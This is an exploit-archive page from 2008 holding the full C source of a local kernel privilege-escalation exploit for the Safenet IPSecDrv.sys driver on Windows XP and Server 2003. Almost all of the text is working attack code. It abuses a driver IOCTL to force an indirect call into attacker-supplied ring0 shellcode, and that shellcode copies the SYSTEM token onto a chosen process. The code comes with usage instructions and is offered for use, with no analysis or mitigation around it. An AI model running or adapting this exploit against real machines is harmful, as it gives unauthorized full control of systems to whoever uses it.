[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit
# Published : 2008-01-29
# Author : mu-b
# Previous Title : Total Video Player 1.03 M3U File Local Buffer Overflow Exploit
# Next Title : Total Video Player 1.20 M3U File Local Stack Buffer Overflow Exploit
/* safenet-ipsec-call.c
*
* Copyright (c) 2008 by <mu-b@digit-labs.org>
*
* Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit
* by mu-b - Thu 03 Jan 2008
*
* - Tested on: IPSecDrv.sys 10.4.0.12
* bundle with: SafeNET HighAssurance Remote, SoftRemote
* - Microsoft Windows 2003 SP2
*
* user definable offset used in an indirect call.
*
* .text:10009970 000 mov eax, [esp+arg_0]
* .text:10009974 000 mov ecx, [esp+arg_4]
* .text:10009978 000 shl eax, 4
* .text:1000997B 000 push ecx
* .text:1000997C 004 call off_1001C604[eax]
*
* Note: this can be made universal for all array offsets,
* relatively easily since we control the offset and therefore
* the memory address..
* IPSecDrv.sys 10.4.0.12 - 0x1C604
* 10.3.5.6 - 0x1B604
*
* Compile: MinGW + -lntdll
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ddk/ntapi.h>
#define IPSECDRV_IOCTL 0x80002064
#define ARG_SIZE(a) ((a)/sizeof (void *))
static unsigned char win32_fixup[] =
"x53"
"x52";
static unsigned char win2k3_ring0_shell[] =
/* _ring0 */
"xb8x24xf1xdfxff"
"x8bx00"
"x8bxb0x18x02x00x00"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98x94x00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80x9cx00x00x00"
"x2dx98x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98x94x00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80x9cx00x00x00"
"x2dx98x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xd8x00x00x00"
"x89x88xd8x00x00x00"
"x90";
static unsigned char winxp_ring0_shell[] =
/* _ring0 */
"xb8x24xf1xdfxff"
"x8bx00"
"x8bx70x44"
"x89xf0"
/* _sys_eprocess_loop */
"x8bx98x84x00x00x00"
"x81xfbx04x00x00x00"
"x74x11"
"x8bx80x8cx00x00x00"
"x2dx88x00x00x00"
"x39xf0"
"x75xe3"
"xebx21"
/* _sys_eprocess_found */
"x89xc1"
"x89xf0"
/* _cmd_eprocess_loop */
"x8bx98x84x00x00x00"
"x81xfbx00x00x00x00"
"x74x10"
"x8bx80x8cx00x00x00"
"x2dx88x00x00x00"
"x39xf0"
"x75xe3"
/* _not_found */
"xcc"
/* _cmd_eprocess_found
* _ring0_end */
/* copy tokens!$%! */
"x8bx89xc8x00x00x00"
"x89x88xc8x00x00x00"
"x90";
static unsigned char win32_ret[] =
"x5a"
"x5b"
"xc2x04x00";
struct ioctl_req {
void *arg[ARG_SIZE(0x4C)];
};
static PCHAR
fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen)
{
DWORD dwVersion, dwMajorVersion, dwMinorVersion;
dwVersion = GetVersion ();
dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));
if (dwMajorVersion != 5)
{
fprintf (stderr, "* GetVersion, unsupported versionn");
exit (EXIT_FAILURE);
}
switch (dwMinorVersion)
{
case 1:
*zlen = sizeof winxp_ring0_shell - 1;
*(PDWORD) &winxp_ring0_shell[55] = ppid;
return (winxp_ring0_shell);
case 2:
*zlen = sizeof win2k3_ring0_shell - 1;
*(PDWORD) &win2k3_ring0_shell[58] = ppid;
return (win2k3_ring0_shell);
default:
fprintf (stderr, "* GetVersion, unsupported versionn");
exit (EXIT_FAILURE);
}
return (NULL);
}
static PVOID
get_module_base (void)
{
PSYSTEM_MODULE_INFORMATION_ENTRY pModuleBase;
PSYSTEM_MODULE_INFORMATION pModuleInfo;
DWORD i, num_modules, status, rlen;
PVOID result;
status = NtQuerySystemInformation (SystemModuleInformation, NULL, 0, &rlen);
if (status != STATUS_INFO_LENGTH_MISMATCH)
{
fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
exit (EXIT_FAILURE);
}
pModuleInfo = (PSYSTEM_MODULE_INFORMATION) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, rlen);
status = NtQuerySystemInformation (SystemModuleInformation, pModuleInfo, rlen, &rlen);
if (status != STATUS_SUCCESS)
{
fprintf (stderr, "* NtQuerySystemInformation failed, 0x%08Xn", status);
exit (EXIT_FAILURE);
}
num_modules = pModuleInfo->Count;
pModuleBase = &pModuleInfo->Module[0];
result = NULL;
for (i = 0; i < num_modules; i++, pModuleBase++)
if (strstr (pModuleBase->ImageName, "IPSECDRV.sys"))
{
result = pModuleBase->Base;
break;
}
HeapFree (GetProcessHeap (), HEAP_NO_SERIALIZE, pModuleInfo);
return (result);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
LPVOID c_addr, p_addr;
LPVOID zpage, zbuf, base, pbase;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;
printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM exploitn"
"by: <mu-b@digit-labs.org>n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!nn");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\.\IPSecDrv", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %dn", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failedn");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]n",
zpage, 0x10000);
c_addr = zpage;
base = get_module_base ();
p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) / 16);
printf ("* base: 0x%08X, p: 0x%08Xn", base + 0x1C604, &c_addr);
printf ("* call distance: 0x%08Xn", p_addr);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = p_addr;
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failedn");
exit (EXIT_FAILURE);
}
printf ("donenn"
"* hmmm, you didn't STOP the box?!?!n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
// www.Syue.com [2008-01-29]